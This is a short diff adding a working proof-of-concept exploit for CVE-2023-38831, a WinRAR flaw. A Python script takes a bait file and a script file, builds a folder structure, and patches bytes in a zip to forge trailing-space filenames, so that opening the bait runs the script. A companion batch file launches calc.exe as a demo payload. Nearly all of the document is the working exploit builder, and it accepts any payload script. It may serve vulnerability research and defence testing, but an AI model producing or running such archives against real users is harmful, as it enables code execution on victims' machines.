poc

exploit.py

@@ -0,0 +1,45 @@
+import shutil
+import os
+
+def exploit():
+    print("CVE-2023-38831 POC")
+    print("-------------------------------")
+
+    bait_file = input("Enter the bait file name: ")
+    script_file = input("Enter the script file name: ")
+    output_file = input("Enter the output RAR file name: ")
+
+    if not os.path.exists(bait_file):
+        print(f"Error: {bait_file} does not exist.")
+        return
+    if not os.path.exists(script_file):
+        print(f"Error: {script_file} does not exist.")
+        return
+
+    if not output_file.endswith(".rar"):
+        output_file += ".rar"
+
+    template = "tmp"
+    if os.path.exists(template):
+        shutil.rmtree(template)
+    os.mkdir(template)
+
+    d = os.path.join(template, bait_file + "A")
+    os.mkdir(d)
+    shutil.copyfile(script_file, os.path.join(d, bait_file + "A.cmd"))
+    shutil.copyfile(bait_file, os.path.join(template, bait_file + "B"))
+
+    shutil.make_archive(template, 'zip', template)
+    with open(template + ".zip", "rb") as f:
+        content = f.read()
+        content = content.replace(b"A", b" ")
+        content = content.replace(b"B", b" ")
+    os.remove(template + ".zip")
+
+    with open(output_file, "wb") as f:
+        f.write(content)
+
+    print(f"Exploit generated successfully as '{output_file}'.")
+
+if __name__ == "__main__":
+    exploit()

script.bat

@@ -0,0 +1 @@
+calc.exe